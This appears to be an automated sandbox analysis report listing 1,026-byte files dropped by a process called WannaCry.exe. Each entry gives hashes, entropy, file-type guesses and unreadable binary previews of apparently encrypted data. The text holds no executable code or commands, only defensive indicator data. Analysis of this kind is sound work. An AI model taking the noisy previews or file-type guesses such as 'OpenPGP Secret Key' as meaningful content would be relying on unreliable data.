                                                                              Preview:.MG..{;.r..h..w.C..qR....E./2.h.0......3.g<..S;Sl..p..lT..T...t+.!..h.\.....x...A..`..$..0...E.....^.6`...9....~.*..S/.k........u....uyq...........T].>.........@ NX/.bWl..n..p..5.%...6.Q.T...6..........|...#.:..E.;~.~..J.kC...VjJs.G..j.a...r..*.....ZP...4.U3.@.=..........UKSE.sH...s1 ....=.. "~J.p|.(..>=9.......?.N.x.....5........n.........N..1..%..2W../.20.O.>gm(..T~...9..._D.[.a'....q..;.......$...... 'ig6...O....?.;..z...k.8.]..C.L. .L..3../.^|b..C.Z. ..X........hT?..hz.....!!...v.dP.(.....ITX..t.1.E.....3.d..R.?.V....`tr,"..@jk5....*,..k.;..y..l........Y.....d.m..6..-...[..$9I.u."(c4._...S&.;..{.6..a|.2.qr%...{.K.. W...[.(..#.W...WOf.Sbl>....4.&<1.i....l.....3...q...B....g.....ZI.X.i..3.......S1A...95....E...=W........\...^j...N.h...r'.B.^..m....b|.X..2..cV....+YB.1"18:...A.6.+......d..e@;i1.97.......i.u.O....c7(...v3..?S...B@.3\q.O...$..v....*.Z.am...n.. .(.h.xYV.s[b..[.VZ?......._g[.L..OD.-DG:Pn.. ..p.]jA.ti.%.{2<.`U....b..Y.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.81555875200007
                                                                              Encrypted:false
                                                                              SSDEEP:24:pPkiuNhz7RELwxW/hqnyUZBPZ8QoxXqeOo0he6sT7byNS6:YXlJQSyEJyQoVq2Ke6v
                                                                              MD5:2EDB465551157BB030AEF18D58337B3C
                                                                              SHA1:8EA2DF29DF5118683AA3CCE8DEF3B40B8185E3FD
                                                                              SHA-256:0B3A13C1B638DC6B042F8C20BD8209E2E08B6A952A962A5AE75CB6F37509E9BA
                                                                              SHA-512:34D7766DA68C4DB033628839BF9D74A8F34B354E094C1B2C306FF81904EE34C3B8C0C70CAEBF88A9B982CACE5344A2C5E90D3A02FD25C091E9C0B4C5666ACE6D
                                                                              Malicious:false
                                                                              Preview:Ps.<.".X.....w.dT..y....[K......H..A.....|..NG*.O3.@...........j.h.T@*...................(0....,L......h...........g....oB/{....F....L.#.;D..c...5......:#..G\m$.#.J....l,.=,(..`j...N.........)*..k.N8Fp..D.[7..s.4...h.....c._.B......&).......}...wR...].......)h.6L...*..c....@1.Pz.......U....xZD....P..iT-,.b.../..f$..$.k.1q..YDO.6....B2.X....y.....m.....6..Y..~...~8..UNX............c.u......^.j........Z.V.|Jk...;..8b.v^...+._.0..&..S.pc.*..7.F..^......F.@Q8....]._.Fq.Q..7.KY.+'.2.b.......b#..}Ht.J. .l..P.....+.n.?f.?..&....,..z.....^... .......`..).X.M...S..gj........eb.$........y....c.....<.m.<.../..*.bt*z.....K.eA.....z...V?..mX.4W..S:.fL.z.y..>..ko.../..&z..V-_.i....2.j.....R-.g...g...t.rI..i5Z...@.....LXp../@...g.'(.&..,5K..h..6~.m>.........D.>......... P....?)a....%.5`....u<.C.e..j..g$...=.'+...6.uGC\.w....5.ky...fe...L../4.6g...}.o.*........q75N>U...#u..W.K:5\...Wb.^..z.PI...",7..7..=..ax.n....6..@.2Y..e.l. r.HW.b_..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.7942371145515805
                                                                              Encrypted:false
                                                                              SSDEEP:24:EVGOtnXl06XCTt5mJuZw4qEZjgXSCwO3MPWAGO5g2iJhAHs:EJ1/STjmJf5qgLwO8OKOJhAHs
                                                                              MD5:E943B642819F70E37405D8CD61A6FCE9
                                                                              SHA1:032FD100102566E7B45832E6F3485B6943F95668
                                                                              SHA-256:767D05D37D51BEBD28565A38D94CAE95720D4587FB614768DEEE03DA3250641B
                                                                              SHA-512:AFF85C92317251A82D92A7B9237C91C63D04C767B0DFD96E0D7FE0CC3831833997525ED45AED5D02BCD457595D29B0A9017D381859FF8FA987CDC5F6E98EFAF8
                                                                              Malicious:false
                                                                              Preview:q....4..Wy$O./PM.........0..;.`.....~.^..pv....2Wf.RC...e.S#j.)...........ij..k.d....u.q.i.:........Q...t.l.W4{8.....}.o...s....@Gq...6.,P0ck.G....5..V.o.\...*......@u..D.B.G.JWa.-.*../..x..8...<.>w.@....T...Tr...|.i.../W|@..#..W).......$.'F{..c2........L}6....?Z.....?<..m....9......oO.xt3.j...7...J./c6...L.j..0.=l.....CR_....|.V.Ic.<...;,..a...~$.Ph....&{.Q.._...Wb..i..z,.C..d.u.v..$Y.Y..P....wC..p;h..._g.x..)...0..O.....b.n>tC.T.N...4=.E....^;.....S..>s.!+......I....`.X....y.Pw...L..)pph...,......A0...Z..^*Re..PS...y.:y..0..-.f.3..^3.......0qd............]X.Z@...Y`%.....~..j....'s3U1..!..../!..4y_....~.V..d..q..B^.8AZ..j..G;..j..7.=u..K.h3.I_jp.x......!y.......c<.)s.d.@Ke....`.L.c.m..%...G...$.gN.#...R...+H."\.Lx_ld..tX{.C..=U.9Z. .....[..;..#...(.^8..m..uD..e...Jk$..~...p..A....1w...U...HS...zC......}%.$...L.<....L......g.......Gz.!9P..%..$(....a.o....t.].=R[....H.d.y.j.)......)..J-2.@(5....ha..Zl....u........?..ja.,o.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.824419862353599
                                                                              Encrypted:false
                                                                              SSDEEP:24:O/k7fr9YK/Nz5F6wKHi89A7gYyXsNfF9G5OUieHhPYrPrZY:OsfJJilu4s9F9VUiQIrZY
                                                                              MD5:AB421734BC4B5C106F3E26BB6C33A9C0
                                                                              SHA1:701CCA95A19C0BAF8E0732566A4E7346B3501158
                                                                              SHA-256:7ABED9FB7665923BFE026B61A5B77D79BB9754F16A68D948C03D6BF1CEFECEA2
                                                                              SHA-512:378F1786DDD9D2A85CEB6C9D7F4A72ACF57D09E1475CD4143636C1D314F5918BE7B3B745DED4EEE7E652A6A3B4FB056FDD6FEA030160CB6548BA47B59E8A3E60
                                                                              Malicious:false
                                                                              Preview:@.G......=W0.O.d..u......?7.4.U...d=...<V...r...m..J...g...%...A......B.g.a....P..x..@.C..H..G._.g\.W..X..;.^.b;dt.$.......~.Gb.p...(..._8NBh....IV.=~.....>...5z.... ..)..~.....9R4@.P`.-P....MQ0EH.ki....r*l%..=#=tQu...d..G.^Iz...|w.%..kh.h..iR...Q....`...YZE.fz..R-......)&...'.ao..9|.:....._..!..:..q..uO.nC..f..L...]....h.8*.~......fY.n...($..~.K\..h..$.)..y...i... .hv..b.L.U.b.!.(+...N0.&.P.z.....1.~...#...S.C.I.Q.Vp.w.Q..)y.......p... >,...e..]........*vg..e....6............Y.......-zC.v.>F..|../.l}I..>...1.......0.i6......ccz<.xTYt.CW@.E:...^v;.....Y....g......[.b....[(T/.F..r...)..3...U.......=........t..z4.....}{w.....k.-...~D.A(...'..P.(.C......;w...G.T.....S.....=..8.%5;DV(...u.P9.....q...+.*..K+&. ..sA....N.J...e....._$G.D...<d...&..i....[.$l....%x.0@....A.c.\zg..x....B.....6..4.g2....Qv...td..|.%..S4..........o...8......G?<8.b...#....}.6.........@/....m.................v.[.\....Lw..s]..k....d..q`. ..e,..j..F..e..p"X..s..I$
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.831825926478697
                                                                              Encrypted:false
                                                                              SSDEEP:24:DLj5mFOZ3OAWjSO5bmFK+OZxXMElTT/U1+Vxy7n:DOOkjSODX7lf/UUK
                                                                              MD5:1EC1B414A30C5D3AE9BB4C344B55B388
                                                                              SHA1:CC57EAD15F1ED9DA952EED8404DBD2C6260E0315
                                                                              SHA-256:58957B1D1296065B0F541EB69192040AA907EB1B4810187A019E1EDD8A3572F6
                                                                              SHA-512:8B12B975F9DC21095A61454C674D7881ECF5E2937CBBC479F212D050B5438FD7C4E0139518FD8B48680034E7E09330456A23EDC93E5B8978DD150B7979BF9267
                                                                              Malicious:false
                                                                              Preview:.2....).U....E4....h%.]wm...8nS3.=...?.s.....E....F.@?.P..Q.J...<.....W.\.9.....+4.D.~.5..$<.l..NE.>,r|...W....v2*.....\.'.T%.:~-?F..i.X.....V.?..F...VTdp/d..>.............._...2.V..L..m.-2.....`..=..r.......A..3....w..Z.g$......|.D3\.?....P..x..$.o...K..6...*....w.g....x.#Y..Lbi..........&ao......}..._C.v..j.2.l..)...P5I%)....Gv....I.........j..k.3...X..K.....MCw+F.>..../.F....h.$*...o..0.....^<....Jn.F...a.w.cZ'%_..fj.'.....;.o]=.........9^..&...89.....2J..t.jl.A.A.M,..is^)$._....3..G[Z0.....o..$.Y/...n..P. Q(...|S=..m..X.;.+......7.;.....xj.2..Pd.I....(....!t..Sh.84..0....U.U~H..p6..f.'....9GPrM6...h.W'.i>......i......?..,....vY.Mm...37..0t.).\]../.m...U...._f..m)gZ..Fr9.m}S|..,..|Pe..Z.1X.....]...D. .n..yf(...c".V......n;d6zr...A8.1.G.lD.G^2..._.O....1.3.....*.e...........+&}.@..lX...u$29&.v7...i...>.jJ.NfHB..C&.......7.i....|.SR.'m..gk'..F..}.'.....J.8'p.G@q4).lZ..&"...].1..0.......a.....(q9h..oe..G.Q.......b/._...O2.........A.N
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.830503485654638
                                                                              Encrypted:false
                                                                              SSDEEP:24:50syl7Jfov631YyslqqZwhsQ+pQFXRvu5NPNR:5XyVJf663mojsQDJRYNP7
                                                                              MD5:813F8F2A511C04EF6D18538C49C3B9CD
                                                                              SHA1:B7ADC0E18FA4BC7CBFFD21EA4200A0A9910C11FA
                                                                              SHA-256:E800A32D6E0C590C9101BC44913B5D193E761276FFE4805453E88478493699DA
                                                                              SHA-512:CAC1450EB98E77FADA3E659162CD7E601F66ABD12BC7EAB30FCCE97C960EA84653AACDF836FE0744233D757BBBA780C36508A42E4DDD99F841C481C913323A94
                                                                              Malicious:false
                                                                              Preview:q?..nd.].A .DT.}...f.....5......S*)5..?;..R.VL@'...*#.n2.P..I.-...-..+.k..V..eW.v.niUQk.[.iN.S..l.-e...@1|7.....z.u..M...IAn..T.o.5..]).K6... ........ .S.v..(...1.dD.~..w.u8...RH.q. .1$..y.p|.....x.."..C..yQx......stvOZ^...<......u....|.xG....HLr..W..).W..;..3...5'D..0.....Q.....t...-n....U.=...c.v....B...?.b.7f..RfX!2jM.\.....KR.~J.w.....y.%>.t..g....j......C..!...B?......v......`".=..w...$..VX....X..F....lr..v&G.....f.7n.......%...O.@.5..1.d..pO..@2..G!..H.$.....L........Fh.V-./.xx....,..f...0.n..n.y4..[..L..+.....1:-U...|7B.......F..v...C=..../.....c. .c..e)h......%..~J.'...@.......S..V....}.P...........|A%..I^^.W..f..e..@p9..{..F.|.. ......'.....Gz.k...Z...Y0...F...~.q....i.!Rw.:...z.6.,.}......+..G.....~...U....-.j]7V4..P....._{=b.yl.4.........)j.|..~..=h...{......96?.^..le..#..#C..LC..0.4.8.....~....G....tL`.C?eB.7CI,...2.%.....=#...)...2...T^........(..G..cdT......;JoH.^.>&b3..._Hh...D......D|...tP....u,je..........V.U.....K..v
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.808599384761948
                                                                              Encrypted:false
                                                                              SSDEEP:24:NHIdMKPYdMjG+0AGso72/k4mmaplfGBG7:9qFTjR/k4mmaplfGQ
                                                                              MD5:D77C28BD3DC72D39030DA6C041D95D5A
                                                                              SHA1:A84C66DBB1C35DAF6007B8203892999A00E9C66A
                                                                              SHA-256:CF62040B08DF1C0A603999D36E554791FBB8957F9A8A401DDE6FC5DE69EC3980
                                                                              SHA-512:82ED47071031A05E76747E06B02A9096C70CB30EE443F993129DDFF949F2D54E9C97E6FA9A7B33C8369EC77D961F0EF8B8C324A642983C47CD1B8E46AA85C0C6
                                                                              Malicious:false
                                                                              Preview:.X.g....^`...q....t..Evx........rL.D.....B6n.=.. ..1....z....w.....*..{.8.JK_.X..{p...h.@..5.....^O.%......Vf.....H.. ....#B.v.....E)ed..h.CA.{.^...d{E..)..v..K..J7~=..S.-..r)...!rO........B_&~*....3..O....Q....Q....:M;.6.k~...^....\.".....H..Zriw.2..p|. .6x....h}...,...gf....?hp.p...A. .K.zfj.c........{l.WB.*/..s..N7.ell.....n..BFR.r...ls..H.%...q..b..."?.. J..6.............oq[.M!.....9-W$.....C/....t].%..`.%..A.;.....T.l..?.L..e\._I.......F..X.L..;2..}c......|."Y.....[)E...U".j......@..8.h...E.......8$'P.G..6\.F.[k.llv2.=t.2:...m.H......{.cX..A..e.R...(.I.Q.'.XdD.p......4.^#5..".9.`......u.~.7.u.1....LS..-...D.'.e..u.A[qj..........;...v.Fj}..O.3.K4........i.T.......#.^.8F.....u{.E."zp......Y.......#..1U..K.O.$cr..N.-.<{..j..cax...2y..%.9.X.K..d.O.C..v|......~+R.E.6..af^......J...g.=<d.+..ie..8....T"M.l..E.$..-.KA..`.K..e/.+...2..>|..g.^..4N.Q.h.>.ESz#D82..5..d.4.Y\...9.2...st..>R.\.....yM/.-...)....xg7........W.BT...F.......2o.7
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.826520726652698
                                                                              Encrypted:false
                                                                              SSDEEP:24:FPmRHMSc0flXr3KCRKWIE0uOeCbJHxvZZVVtpxcFQwqTyV3roD:FPmRsSc0fZr3KjE0uxCbJHlf/WIyxk
                                                                              MD5:E9F8AD48750F3FCCB8694B3666CF9C4F
                                                                              SHA1:D5D228A1C2C0C903DA418069DA1AC04C1433CD31
                                                                              SHA-256:F10815B345DB464E087EC9F9087E780A0D4C26D28AB91CA59F687B7100126820
                                                                              SHA-512:57F032C9084E187CC18E2857A971D406005ADDF367CE385064B7E7E7B70770A7E16708B19377E045EDA5B7C83FDAE38D1A5094CB1838D711D7DAC93A1AEA3723
                                                                              Malicious:false
                                                                              Preview:.C.8.....0..,...........2.." ].A/....'.Z..T....:.-.@.r!...y....L...Q..+o.r...1h4.C$.D..o.R.7....~...&.]...8`dZ.UT.6.....=...{.x.t6c/`...A..l..~(.{f.1>.x.v.e.6..2K.=I........0.X..'..Xz.......J...:FSk...MOX.[..S.,....S....uA*.....g....L.J..M"@..^..P..U....5.Q..n.~-L..8..)..\.e.&...X..5.....tG.Y........T.\..4..%.%......^IT.0.".&.........r......[.w.,...CH...&...d...x+.W.....7f.V:..~.l..8..$.L...J...A.d.K.....d..c)`a\..*.s......J..<.9|9...y.(....R[.]..H....Y.r.|.a.V.\.^.bCjP.....t.1..H8...V..n#%.5d..^.&.......t.9...g.V..E......Q..0'...)..j.(.cS....u.NYY..B..Z+7..#...._..|?..R...:[[."..Q.E-.3G.s...f\...1E.I .=.zT..D.........c...+.g....rl.7_J#A.....g,.....c...$.H...Z.3...........M...#..hS..g|/...MU.S.W...c...LHZ.......E=.G.o5.<(.\.......,.)V,.;..f"..\.0...BF..!.A.._.....y.u.1.....#..U.....!....&;....ff.....NH{..'..yNtC..0.EQ^.....p.*...".Y...0<....jO..W.+'.0.=.C..5\..y.q....p......q....=..Iqb.....Gt.....H.\o.f..d..OW.....0r!B....s..._r[.S.2.X
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.792640838413994
                                                                              Encrypted:false
                                                                              SSDEEP:24:ZUKBOOnVCxmsV8ndYHO5XK9VAM0O6fVXsA/2NlGvlg/k:PBO4CEDndYHO1ZMh6NcArvKk
                                                                              MD5:1F1D0CBFAEE1654D4D9F62C98F6246D8
                                                                              SHA1:1D06184A3CBCD53D7CEBB394256C777AD8420771
                                                                              SHA-256:E95D0E6AC2CC646A5001AD98470873ED9B7FD3DE87EAC7CB395BD76277E42B41
                                                                              SHA-512:20DA21733D4F21C33E7AE60866F68E46FC4C93DAC5894E519F6B415E08482E610DDEB4A3726CF308A52FF91CAC0CD2342771A34E518EAE72AC88CF250810EEAE
                                                                              Malicious:false
                                                                              Preview:.h.!.....tPD.p....^..l.l..BV6D.....f"...SJ...y.l.....c..-..o.w..L......gz$a.Tk.Q.m.X.}7c.M.....7k..l...L..Rx..U7..K.......O..:.V;.,_Ayh.I.,L^Y.p ...".^.,....u.W3..4+...<... L.......%-El2s......x-..A......'H...:.D'.o.7...8.Q.......:S[.:..r$.6...S....'.S?s.....;..5.WH..".........Y....).. 3.-|....&...W..L.[u....k?U}.m...u........r{)p...9.z.J.t......b.v..../>aq.W...... ._..1....ES] T.^x6.M...5t.8.....*.2)..#....b. .Ce....K....\+eDu;.......&.Z.fn..z.....e........V?.S....t.......B.7./......>7..........5.r*.).......33.....#.dOj.K...Hp......8....T[Z%..4...V...u..../._... 2.....,.gT.X.].a...i6...<sc.W.K...!......=Ok ..'.k1)./....f..w.....#.3.....W.2....v,...R .......u.)hh...b..p.l=..S0;.p.8..@HLP?..h1.LYZ...U4..d......Qb.#....aqp)ob].Chcc....a...'fw.......{T..;n..:.2....A.i.....4..3....:...%.Y. ..F.]....H....OU....?I.... v....x....'.(......3..E)..b..e.wIpfJ..~..C.ZM.%..c)...pVb.......\.L}.6.L..M.......a......^G.R...[.EU/X..D.l.a.-'.U.Cm
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.802930386357319
                                                                              Encrypted:false
                                                                              SSDEEP:24:Iho4D5FlrzYpMRao3ltuAaukuExf5j01th9fZE3XvdJo+Wb6hf0:IhxzYplo3/PbgREuXFQ6m
                                                                              MD5:80206B11AABC461CCC950FA48ABEFDCA
                                                                              SHA1:D569553844047437E3DDF98B77BF948D9BC3059F
                                                                              SHA-256:95905E6FFB11508C6640D73F89361D7BA5392A979B66ABC05D1BFA706F101208
                                                                              SHA-512:351CD1EC14EBEE225E4C3A058343E0769A05809EBA2658BC55FD991E40DE0B5B499937B198274F06768AB062055FFEEDF287E7F088959D5270C4AABA67FA9DAC
                                                                              Malicious:false
                                                                              Preview:c:.G...j.....x.]lM.C.e...1g.O!q_Ru..d.....h..iwS.)......j}1.'e.5o{..r..DK..lg.`..xN.....6q.:..u..E....8.ak].}...j..1L.x...=.y.".. w!.6.NE..q.].].Q..byB.U.`...`./..U....F,sG9.#f..q....t.$.$oy..........E.E|.._BL!.t&....}.e.[..b._...J...?.M.Yw...!|...)z..r._..wc&......<[.P..3.<l...2EY...ph^.t.$...#.0...fM.0.N0\....3.^v...C....*....qE...YH..K.(.f..4=..%1..z.Ow..9...{ .....d*.7...]....dk..e...a'^..[w;P......$.{.....<..'...s..a..[...%h...J....!-.....^.=KS]3i..Y..>..wV....Hb...>Oy....#&.pk.J.0.e.} .1.;/....E.^.n.f.......$I.o..t[.oo<.]..v.]..3.\.]..q...v.....>vPm.........e.R.6.1.........6....I..|z....a`.d'...)^{X%\&...,..T.P*.a..`........|......[.m....3.......M$..p.....N..zGk."t.J.-.......B8'R.?..r.....6,F...6.H.>...%.Q?U`.8..MB..im[...%.. ..H...[X2..3.m....W.G...E`8.a].{X;.ThS.B......&......]l...)..&hU-G..~.0o..[. :..{.y.]qY(....8..%........{LR..5M....R...2..M.J...=.,PvX.......2..cY*.....L..U(:XR..~z..P%0..lH.@e....*..g..^^...|..../...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.835979521396322
                                                                              Encrypted:false
                                                                              SSDEEP:24:unF0zLJBfZ+FEARxHTfTxkYnVea5YR5d/ov:uneztBfZ+FEAvTyYVea525hov
                                                                              MD5:86BA4868D485FCCE75DA2E021E2D5F35
                                                                              SHA1:35707D912D0BABFE1CACD95F4041063B2778F914
                                                                              SHA-256:96DB35892A507036E03CA54B12C9E20C0DDA7A648379C1AB5474A065682324D0
                                                                              SHA-512:F11ACB2B722243CE18F06AFF142A4213D1EFA1C6E2B6ECE90E1A386E0D8357792F0B7AEBA3B0F09690A2BEF6387FE129C900C3877C444DACBF4F7969D7C26CC1
                                                                              Malicious:false
                                                                              Preview:'..F..X..W....}.qHn....|.T..a..$......cv{Z'F@I.y..=y......[..3...>.t3..t._..c.S.....i....&`...i.[..-....$|........C.2.k..K..nn...O.O..Y......DB<.N...+...V.N......b<.0.K..`D...T.!lv..a..E...z.......l...Re1 ?..C;z|.2....i>.k..}...#?.f.Q]O..J.b.<.m..%../..P.. ...S.....%B.....cn~3$.;1.NV...J,..M..A......x&Y/[..a.|..5.mc....j...B..!....a9.[]p....e..91.yLI........4u..........>@..."..k..^U;..-...Z.&.Q.C....K1|s.N...zFz..q.-.u.X..B.[Z.\....L1.A&kpH..{....Jp..h..k.A..2,..7....1...o.@...`.B...3.G'...w.b...k.#.Na......,l.o..U..Q.pa.=#..;..#F.....N....E.*%....+...r_..(F&r.......{e...AN.180a}.f..t..D...k*...oP....8.....>8.Y.t[.]g7.E[Z..S.;].O....0.:...-.y..[...Q..~TV....w..b...n...g..k..HFf....I.6...*K....J).c.Or...H..w...Tg~...L.eb_.(}...4....G...=.o."....m..|./.A..L.....2..b.....^......,.X...R2...K...?.....[."V;h......7.K..Hn....ay..........#...ai.:UD....U....RF.{.......U....XdU54...@~X.)b.N.{.+.S..Ht.....l.n.`.}.f\p~....?.....|iGg.0..I..<
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.798345648377475
                                                                              Encrypted:false
                                                                              SSDEEP:24:c93G4JvJxcBBrhH9V+rqMfWmSjlEC9XoutSaXn:eG4JvKVTV+WdmShPoutP
                                                                              MD5:07B0CBCC09EFCE8993B4EEC2D2EB57B1
                                                                              SHA1:E3DC939B31B8687FBB68CE66FBE4AAF749869FAB
                                                                              SHA-256:09E97CB118F7642DBC8BC30B3791F2AB5ECD6B48314C5BF21A1E01C30C85C13D
                                                                              SHA-512:C8702125638C18C1F157DBE083B9479ECCFCE12F10DFAD8583EFB0C62201D7B5BA3646447708B7B1B03AEC4C1E5ABEBB9ACADB886C4EE25D312CDA26641BD8BA
                                                                              Malicious:false
                                                                              Preview:....5P...}.`.....W....%....'.b.b...B..R.....o.J.....e.A..y..yqf.|PCp....6..H3.o.Gg.G...W...g2....*h..p...;>v...x....np.fW.J...'7wr.O}X..xo.y..3%.....8....~..ZE.M...Dd-NT.F......_V........gas+..}......KH..'C.A..9.d...S.d.D..3.4...>.Nf.....a+._.....~.}.z..N.h..m..0......^..^C_...=.R...Co.e...........7hA..e'..S.-n...E`.X.5..'.Cp.:b.#.._..)....NX].W..5T.9k[..{.j..AB..g.T...j(.s..#..o.o....@T..i...q.....%.....P..y.q!...@@*.i.M./..D.z-...TS.=.&.pA.6..W.1.T....*.'H....Q.../....F...u4.p.> ..8.$_.....#B?#w..w}U....K..[......T..TJV.....j.n.....K..?.?......S....O.;.@..&v7.;{.D"....hD*.E.7S.....X.. .....iv;...4.<....kPk+r#.s...7i......P....1........q.....I@1.z.W.v....kA.Xrj.......;>..%.~".<.8...j.Vq.am#.....c......b%p..A\.N}.L......w...;....U].)...g........jk!?.BG...N....S.>6.*.....!.c....o=Z...g.H.~....N.zeg.wC..o.JXPvD/.c0.....E.Icy(\L+!.T..$H./P6q^.0!upJ....A..Z.Amh^s....|..|.=..v.x.h..>p5..o...+..h.N.{p......1Z.h....>.....|Ej,.w0Z............i.Y
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.800885604834709
                                                                              Encrypted:false
                                                                              SSDEEP:24:/wDz8N1uO8T7TSX9u7MJcsnLf/+mhWzPeR4moqW:/wDdOIiMMJbYLmoD
                                                                              MD5:82C0F2F8A244637CC8C70EC2B00C1D22
                                                                              SHA1:9804B331EAC9949C8B206A98C593385EC9F939F4
                                                                              SHA-256:D6D4B37CA4E06B06A54787255A214930D369B3C5334477D8A39B873832D21100
                                                                              SHA-512:6E701618E427D457BBED28708A75766620CD21F6DBB2FCEDB9D9EC1D695426A21B5C7E1AC8A6C6A46F1E87AB8CFA10C37FE373CD111A8AE91EE19B03A1EFBC18
                                                                              Malicious:false
                                                                              Preview:.....U..2v..w.Y;....@.`.U.....3.....p...:.._O....j...\...L..!>..6.1b...L...2...05.Qz._?.Q>.....8..)}i...*%A.]S.....D.........rF..;ec)..E...#_.s~....vC.[......VR......C...*.7....G..~.<..qC.nB.......4....^...^{0.....l......G.2U..pFJ.....c0r.PC.c..;.a...8....)....8.9........}.....2....~....[..S........!+B.[.74....7..n]<...."C.....#!....x^kK..o...exu.8..1...a?.(\...qN......L..#.E|.$s0(.>."K.O..#..Q......*Eu.....8<.......?.9.e.......v==..U?....241..D5..S.EP?3k.^.[I...I..a...r.J..W..a. <.i..fKR.u.H..VY9.....}._..~....|..#d.re-f04........\..9.D...F.]....g..b...2.2...v2.z...O'..T`......[&X.Y+O.c"...e.\...H)...0.~....v..W.q.=G.A.%6..GABU..#...pK.W..e...I.Y.i@..b............c..(q..!..]_....`.<.o=u.c.Fv$Na..]|...E'&.........h.z..v....SN....$TN1.......X..H...4..CRy.-!..[L.Py{...c...&D.|......~.6c.:.N......I.g~`..k..0..A..C..[!....).i.>8x......S.s9WN..flv..\{..c..i9./.@t..;.$jD.......].*T...]..s..8|.Z.g.v\h.}.:..R.F....=.......x(J$5..:.&.?%...jd}+.x...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.841672740278235
                                                                              Encrypted:false
                                                                              SSDEEP:24:NJcPIs2nHxj7Vic2MGyRtNh/0zeQXwn/urzIT:NCjYH5JGyRt0zXO/Qz6
                                                                              MD5:B1E53B51F6AC767A18B00FC47802BE19
                                                                              SHA1:6BFDAF328282E62D922AE8A0B629A8F56714FE6E
                                                                              SHA-256:A4C134B049C0D75E38D749E50651AF6637758ED44F90EFC87B339370719D7DCD
                                                                              SHA-512:E066DA1C83AEDCD672AAD48F33FA20AA4307D629584373418593280C9C6998CC63AB738AC5DB60A64F9FEAE739F48FED39BD761C3DCE883E009D120A26D23ED5
                                                                              Malicious:false
                                                                              Preview:....`.. ....h.S..5..')......#.pn..h..o.X..m]o...i.z..IB.&.bP'jy(.Z...\...1...ze..s....xu...d$9..j..l.d...e.?k...8O.....E..GJ....qNv.7..gg.b/..7nd.P....$.gSa&dj{..<..3......7D.I...Et.QV..Va".s.1..*..Rv...7...U...@.L.9.0..\d..g..l.~.R.E....$ik.+....g......T.......A........j}`....7o.......,..%..=.M.."P+u=b.."...]...)M...\&k...%B...........Z.q:...\..$.-..d.>0s..Kwv........J.....o9(..rr.S..W.'...3=.W|^..).&.:w..-.....x=....+t.(.9..7...'.oe.7.[..0..>.t......I..)(>.R......b.R.$..z....<.~....~5..dT...Bd....)....Iff.~%b.aO.(V.uX.......-&.*.;.C.*{.Zj..w..l....>.../..c..7.)n.....9X(.oN.....#W...D.Y..x..nq..B+.eW..........t./..Arr.+..X2,....r&'........kO..J\.6..CO~.% .1%...-../..?....uj...l...Al....s..=<..K.y..?.!.d.=.-..'...'....#...c.JB..F"...)V....P.np.;.@|.....pgD. . %sj5@.Z.3L..............0.B.dE......q"...}.=S.t...Z]....)|.YXJ...X.I..I.../#..F..tf.w7...k..{....t.....=..8W.m..8[..c'.p.h.C..(...L.-t...zB..n.....^......Jk.p....M...v.......|~iX@...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PGP Secret Sub-key -
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.816025489675063
                                                                              Encrypted:false
                                                                              SSDEEP:24:d4k7x01y3gcpvYdlB4wDMeLUwENy4OqICqQB+Y3:T08hYDB4wFLqNy4zICqQB+Y3
                                                                              MD5:5578C70F2C35F69BA019EEF3D58CC8BD
                                                                              SHA1:7326CBE8F74B3487A46FA95D2BE7658286DD0912
                                                                              SHA-256:C01BED12B14CA77C7F8D98B5E37882AE9989A06A5396B9CA5C03FE2511A70EE9
                                                                              SHA-512:41AFA54C85ADFAE6937176F3C201C8AC0E0FEAD8F66F81487369148BA893F7894D5A357CF290391CD0561B35044AF523C892D2C3BE61C4C362A34509C53D28B6
                                                                              Malicious:false
